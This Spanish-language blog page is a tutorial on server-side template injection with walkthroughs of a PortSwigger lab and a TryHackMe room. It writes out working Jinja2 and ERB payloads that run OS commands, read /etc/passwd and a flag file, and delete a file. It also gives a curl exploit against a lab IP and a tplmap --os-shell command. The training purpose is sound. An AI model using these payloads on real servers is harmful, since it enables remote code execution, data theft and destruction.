
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>Server-side template injection - GRAIL TEAM</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="GRAIL TEAM,"> 
    <meta name="description" content="SSTI
Que és STTISus siglas significan “Server Side Template Injection”, y lo que ocurre en esta vul,"> 
    <meta name="author" content="GRAIL TEAM"> 
    <link rel="alternative" href="atom.xml" title="GRAIL TEAM" type="application/atom+xml"> 
    <link rel="icon" href="/img/favicon.png"> 
    <link href="https://fonts.loli.net/css?family=Roboto+Mono|Rubik&display=swap" rel="stylesheet">
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1429596_nzgqgvnmkjb.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.7.2/animate.min.css">

    
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/codemirror.min.css">

    
<link rel="stylesheet" href="//cdn.bootcss.com/codemirror/5.48.4/theme/dracula.css">

    
<link rel="stylesheet" href="/css/obsidian.css">

    
<link rel="stylesheet" href="/css/ball-atom.min.css">

    
<meta name="generator" content="Hexo 5.3.0"></head>


<body class="loading">
    <div class="loader">
        <div class="la-ball-atom la-2x">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <span id="config-title" style="display:none">GRAIL TEAM</span>
    <div id="loader"></div>
    <div id="single">
    <div class="scrollbar gradient-bg-rev"></div>
<div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <div class="navigation animated fadeIn fast delay-1s">
        <img id="home-icon" class="icon-home" src="/img/favicon.png" alt="" data-url="http://formacion.ctgrail.com">
        <div id="play-icon" title="Play/Pause" class="iconfont icon-play"></div>
        <h3 class="subtitle">Server-side template injection</h3>
        <div class="social">
            <!--        <div class="like-icon">-->
            <!--            <a href="javascript:;" class="likeThis active"><span class="icon-like"></span><span class="count">76</span></a>-->
            <!--        </div>-->
            <div>
                <div class="share">
                    
                </div>
            </div>
        </div>
    </div>
</div>

    <div class="section">
        <div class=article-header-wrapper>
    <div class="article-header">
        <div class="article-cover animated fadeIn" style="
            animation-delay: 600ms;
            animation-duration: 1.2s;
            background-image: 
                radial-gradient(ellipse closest-side, rgba(0, 0, 0, 0.65), #100e17),
                url(/img/cover.jpg) ">
        </div>
        <div class="else">
            <p class="animated fadeInDown">
                
                <a href="/categories/SSTI"><b>「
                    </b>SSTI<b> 」</b></a>
                
                July 08, 2020
            </p>
            <h3 class="post-title animated fadeInDown"><a href="/2020/07/08/SSTI/" title="Server-side template injection" class="">Server-side template injection</a>
            </h3>
            
            <p class="post-count animated fadeInDown">
                
                <span>
                    <b class="iconfont icon-text2"></b> <i>Words count</i>
                    7.6k
                </span>
                
                
                <span>
                    <b class="iconfont icon-timer__s"></b> <i>Reading time</i>
                    7 mins.
                </span>
                
                
                
            </p>
            
            
            <ul class="animated fadeInDown post-tags-list" itemprop="keywords"><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/THM/" rel="tag">THM</a></li><li class="animated fadeInDown post-tags-list-item"><a class="animated fadeInDown post-tags-list-link" href="/tags/Web/" rel="tag">Web</a></li></ul>
            
        </div>
    </div>
</div>

<div class="screen-gradient-after">
    <div class="screen-gradient-content">
        <div class="screen-gradient-content-inside">
            <div class="bold-underline-links screen-gradient-sponsor">
                <p>
                    <span class="animated fadeIn delay-1s"></span>
                </p>
            </div>
        </div>
    </div>
</div>

<div class="article">
    <div class='main'>
        <div class="content markdown animated fadeIn">
            <h1 id="SSTI"><a href="#SSTI" class="headerlink" title="SSTI"></a>SSTI</h1><p><img src="https://i.imgur.com/Q2sEwHS.png"></p>
<h2 id="Que-es-STTI"><a href="#Que-es-STTI" class="headerlink" title="Que és STTI"></a>Que és STTI</h2><p>Sus siglas significan “Server Side Template Injection”, y lo que ocurre en esta vulnerabilidad es cuando una pagina web es dinámica i se habilita introducir datos hacia paginas web o emails. Eso permite el atacante introducir una plantilla y así habilitar la inyección al lado del servidor. Eso es bastante fácil de confundir con el Cross-Site Scripting (XSS) o simplemente omitirlo.<br>A diferencia del XXS, la inyección de plantillas se puede utilizar para atacar directamente los componentes internos de los servidores web y a menudo obtener una ejecución remota (RCE), eso se convierte en un punto potencial para hacer el pivoting.</p>
<p>Ejemplo de código, vemos que pregunta un nombre en un formulario y después contesta con un Hello (nombre introducido).</p>
<pre><code class="XML">template = &quot;&quot;&quot;
&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;body&gt;\
    &lt;form action=&quot;/&quot; method=&quot;post&quot;&gt;\
        What is 2+2:&lt;br&gt;\
        &lt;input type=&quot;text&quot; name=&quot;name&quot; value=&quot;&quot;&gt;\
        &lt;input type=&quot;sumbit&quot; value=&quot;Submit&quot;&gt;\
    &lt;/form&gt;&lt;h2&gt;%s! &lt;/h2&gt;&lt;/body&gt;&lt;/html&gt;&quot;&quot;&quot; %user_input

return render_template_string(template)</code></pre>
<h2 id="Identificacion"><a href="#Identificacion" class="headerlink" title="Identificación"></a>Identificación</h2><p>Lo primero que se tiene que hacer es comprobar és intrucciones en texto plano, existen varias plantillas distintas y se tiene que identificar el payload correspondiente. Las expressiones más comunes són: </p>
<pre><code class="html">Var puede ser un calculo como &#123;&#123;20+1&#125;&#125; o &#123;&#123;3*'7'&#125;&#125;
&#123;var&#125; $&#123;var&#125; &lt;%= var %&gt; [% var %]</code></pre>
<p>Si utilizamos el mismo ejemplo anterior y la respuesta és:</p>
<blockquote>
<p> 21</p>
</blockquote>
<p><img src="https://i.imgur.com/oXbEo2D.png"></p>
<p>Eso significa que hemos encontrado el SSTI. Para seguir podemos buscar los payloads para la ejecucion de comandos, lo he sacado de <a target="_blank" rel="noopener" href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#read-remote-file">PayloadsAllTheThings</a>.</p>
<h2 id="Explotacion"><a href="#Explotacion" class="headerlink" title="Explotación"></a>Explotación</h2><p>Para leer contenido podemos utilizar,  con esto tendriamos un LFI. </p>
<pre><code class="Django">&#123;&#123; config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").read() &#125;&#125;</code></pre>
<p>Si queremos ejecucion de codigo podemos utilizar</p>
<pre><code class="Django">&#123;&#123;config.__class__.__init__.__globals__['os'].popen(cat /etc/passwd).read()&#125;&#125;</code></pre>
<p>Existe un script en python que sirve para hacer una explotacion automàtica, es <a target="_blank" rel="noopener" href="https://github.com/epinna/tplmap">tplmap</a> y la sintaxis bàsica és:</p>
<h2 id="Ejemplos"><a href="#Ejemplos" class="headerlink" title="Ejemplos"></a>Ejemplos</h2><h3 id="Reto-1-Basic-PortSwigger"><a href="#Reto-1-Basic-PortSwigger" class="headerlink" title="Reto 1 - Basic PortSwigger"></a>Reto 1 - Basic PortSwigger</h3><p>Este ejemplo es en una lab de <a target="_blank" rel="noopener" href="https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic">https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic</a><br>A primera vista no vemos nada fuera de lo commun.<br><img src="https://i.imgur.com/IG7X5Eh.png"><br>Pero si le damos a <code>View details</code> al primer producto podemos ver que nos devuelve un mensage en tipo post.</p>
<p>URL : </p>
<pre><code>https://ac7d1f211fbf166080f8360700e500b5.web-security-academy.net/?message=Unfortunately%20this%20product%20is%20out%20of%20stock</code></pre>
<p><img src="https://i.imgur.com/R0PYdBn.png"><br>Parece que podemos modificar el texto pero no ejecuta lo que hemos hecho anteriormente. Con este payload logramos que nos debuelba un message de error.</p>
<pre><code>?message=&lt;%= 20+1%&gt;</code></pre>
<p><img src="https://i.imgur.com/JJ4IzIC.png"></p>
<p>Una vez identificado la inyeccion vamos a probar de hacer primero el RCE.<br>Lo podemos hacer con los siguientes payloads:</p>
<pre><code>&lt;%= system(&#39;cat /etc/passwd&#39;) %&gt;
&lt;%= `ls /` %&gt;
&lt;%= IO.popen(&#39;ls /&#39;).readlines()  %&gt;
&lt;% require &#39;open3&#39; %&gt;&lt;% @a,@b,@c,@d=Open3.popen3(&#39;whoami&#39;) %&gt;&lt;%= @b.readline()%&gt;
&lt;% require &#39;open4&#39; %&gt;&lt;% @a,@b,@c,@d=Open4.popen4(&#39;whoami&#39;) %&gt;&lt;%= @c.readline()%&gt;</code></pre>
<p>El payload que utilizo en html encoded. </p>
<pre><code>message=%3C%=%20`id`%20%%3E</code></pre>
<p><img src="https://i.imgur.com/LDdj8n3.png"></p>
<p>Ahora seguimos con el objetivo: </p>
<p><img src="https://i.imgur.com/xs20tLY.png"></p>
<p>Asi que con el payload siguiente lo completamos.</p>
<pre><code>message=%3C%=%20`rm%20/home/carlos/morale.txt`%20%%3E</code></pre>
<p>Y completamos la lab. </p>
<p><img src="https://i.imgur.com/l7eRhjL.png"></p>
<h3 id="Reto-2-TryHackMe"><a href="#Reto-2-TryHackMe" class="headerlink" title="Reto 2 - TryHackMe"></a>Reto 2 - TryHackMe</h3><p>És el que he utilizado como ejemplo asi que ya identificamos que és una plantilla jinja2. Asi que podemos utilizar los siguientes payloads para comprovarlo. </p>
<pre><code>&#123;&#123;4*4&#125;&#125;[[5*5]]
&#123;&#123;7*'7'&#125;&#125; would result in 7777777
&#123;&#123;config.items()&#125;&#125;</code></pre>
<p>Ahora vamos a probar de leer la flag. </p>
<pre><code># Ejecucion mediante curl 
curl -X POST -d &#39;name=%7B%7Bconfig.__class__.__init__.__globals__%5B%27os%27%5D.popen%28%27cat+%2Fflag%27%29.read%28%29%7D%7D&#39; http://10.10.171.251/ </code></pre>
<p>Output</p>
<pre><code>&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;body&gt;    &lt;form action=&quot;/&quot; method=&quot;post&quot;&gt;      What&#39;s 2+2&lt;br&gt;      &lt;input type=&quot;text&quot; name=&quot;name&quot; value=&quot;&quot;&gt;      &lt;input type=&quot;submit&quot; value=&quot;Submit&quot;&gt;    &lt;/form&gt;&lt;p&gt;cooctus
&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;%  
</code></pre>
<p>Lo interessante seria obtener un shell, eso lo podemos hacer con el tlpmap. Para ello debemos inicarle el siguiente comando.</p>
<pre><code>tplmap.py -u http://10.10.171.251 -d &#39;name&#39; --os-shell -e Jinja2</code></pre>
<p><strong>Labs para practicar</strong> :<br><a target="_blank" rel="noopener" href="https://github.com/s4n7h0/xvwa">https://github.com/s4n7h0/xvwa</a><br><a target="_blank" rel="noopener" href="https://portswigger.net/web-security/server-side-template-injection/exploiting">https://portswigger.net/web-security/server-side-template-injection/exploiting</a></p>
<p><strong>Referencias</strong>:<br><a target="_blank" rel="noopener" href="https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection">https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection</a><br><a target="_blank" rel="noopener" href="https://portswigger.net/research/server-side-template-injection">https://portswigger.net/research/server-side-template-injection</a><br><a target="_blank" rel="noopener" href="https://tryhackme.com/room/zthobscurewebvulns">https://tryhackme.com/room/zthobscurewebvulns</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls"
                data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
            <ul id="audio-list" style="display:none">
                
                
                <li title='0' data-url='/statics/chengdu.mp3'></li>
                
                    
            </ul>
            
            
            
        </div>
        <div class="sidebar">
            <div class="box animated fadeInRight">
                <div class="subbox">
                    <img src="https://res.cloudinary.com/tridiamond/image/upload/v1573019751/TriDiamond_logo_ui_xeublz.jpg" height=300 width=300></img>
                    <p>GRAIL TEAM</p>
                    <span>La calidad nunca es un accidente, siempre es resultado de un esfuerzo de la inteligencia (John Ruskiin)</span>
                    <dl>
                        <dd><a href="#" target="_blank"><span
                                    class=" iconfont icon-github"></span></a></dd>
                        <dd><a href="#" target="_blank"><span
                                    class=" iconfont icon-twitter"></span></a></dd>
                        <dd><a href="#" target="_blank"><span
                                    class=" iconfont icon-stack-overflow"></span></a></dd>
                    </dl>
                </div>
                <ul>
                    <li><a href="/">4 <p>Articles</p></a></li>
                    <li><a href="/categories">21 <p>Categories</p></a></li>
                    <li><a href="/tags">5 <p>Tags</p></a></li>
                </ul>
            </div>
            
            
            
            <div class="box sticky animated fadeInRight faster">
                <div id="toc" class="subbox">
                    <h4>Contents</h4>
                    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SSTI"><span class="toc-number">1.</span> <span class="toc-text">SSTI</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Que-es-STTI"><span class="toc-number">1.1.</span> <span class="toc-text">Que és STTI</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Identificacion"><span class="toc-number">1.2.</span> <span class="toc-text">Identificación</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Explotacion"><span class="toc-number">1.3.</span> <span class="toc-text">Explotación</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ejemplos"><span class="toc-number">1.4.</span> <span class="toc-text">Ejemplos</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Reto-1-Basic-PortSwigger"><span class="toc-number">1.4.1.</span> <span class="toc-text">Reto 1 - Basic PortSwigger</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Reto-2-TryHackMe"><span class="toc-number">1.4.2.</span> <span class="toc-text">Reto 2 - TryHackMe</span></a></li></ol></li></ol></li></ol>
                </div>
            </div>
            
            
        </div>
    </div>
</div>

    </div>
</div>
    <div id="back-to-top" class="animated fadeIn faster">
        <div class="flow"></div>
        <span class="percentage animated fadeIn faster">0%</span>
        <span class="iconfont icon-top02 animated fadeIn faster"></span>
    </div>
</body>
<footer>
    <p class="copyright" id="copyright">
        &copy; 2021
        <span class="gradient-text">
            GRAIL TEAM
        </span>
    </p>
</footer>

<script type="text/javascript" src="https://cdn.bootcss.com/mathjax/2.7.6/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<script>
  MathJax.Hub.Config({
    "HTML-CSS": {
      preferredFont: "TeX",
      availableFonts: ["STIX", "TeX"],
      linebreaks: {
        automatic: true
      },
      EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
      inlineMath: [
        ["$", "$"],
        ["\\(", "\\)"]
      ],
      processEscapes: true,
      ignoreClass: "tex2jax_ignore|dno",
      skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
      noUndefined: {
        attributes: {
          mathcolor: "red",
          mathbackground: "#FFEEEE",
          mathsize: "90%"
        }
      },
      Macros: {
        href: "{}"
      }
    },
    messageStyle: "none"
  });
</script>
<script>
  function initialMathJax() {
    MathJax.Hub.Queue(function () {
      var all = MathJax.Hub.getAllJax(),
        i;
      // console.log(all);
      for (i = 0; i < all.length; i += 1) {
        console.log(all[i].SourceElement().parentNode)
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  }

  function reprocessMathJax() {
    if (typeof MathJax !== 'undefined') {
      MathJax.Hub.Queue(["Typeset", MathJax.Hub]);
    }
  }
</script>


 
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/obsidian.js"></script>
<script src="/js/jquery.truncate.js"></script>
<script src="/js/search.js"></script>
 
<script src="//cdn.bootcss.com/typed.js/2.0.10/typed.min.js"></script>
 
<script src="//cdn.bootcss.com/blueimp-md5/2.12.0/js/md5.min.js"></script>
 
<script src="//cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>


<script src="https://cdn.bootcss.com/codemirror/5.48.4/codemirror.min.js"></script>
 
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/javascript/javascript.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/css/css.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/xml/xml.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/htmlmixed/htmlmixed.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/clike/clike.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/php/php.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/shell/shell.min.js"></script>
  
<script src="//cdn.bootcss.com/codemirror/5.48.4/mode/python/python.min.js"></script>
   
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="//cdn.bootcss.com/photoswipe/4.1.3/default-skin/default-skin.min.css">


<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="//cdn.bootcss.com/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>
  

<script>
  function initialTyped() {
    var typedTextEl = $('.typed-text');
    if (typedTextEl && typedTextEl.length > 0) {
      var typed = new Typed('.typed-text', {
        strings: ['La calidad nunca es un accidente, siempre es resultado de un esfuerzo de la inteligencia (John Ruskiin)', 'Lo que creemos que ya sabemos es a menudo lo que previene que aprendamos (Claude Bernard)'],
        typeSpeed: 90,
        loop: true,
        loopCount: Infinity,
        backSpeed: 20,
      });
    }
  }

  if ($('.article-header') && $('.article-header').length) {
    $(document).ready(function () {
      initialTyped();
    });
  }
</script>






</html>
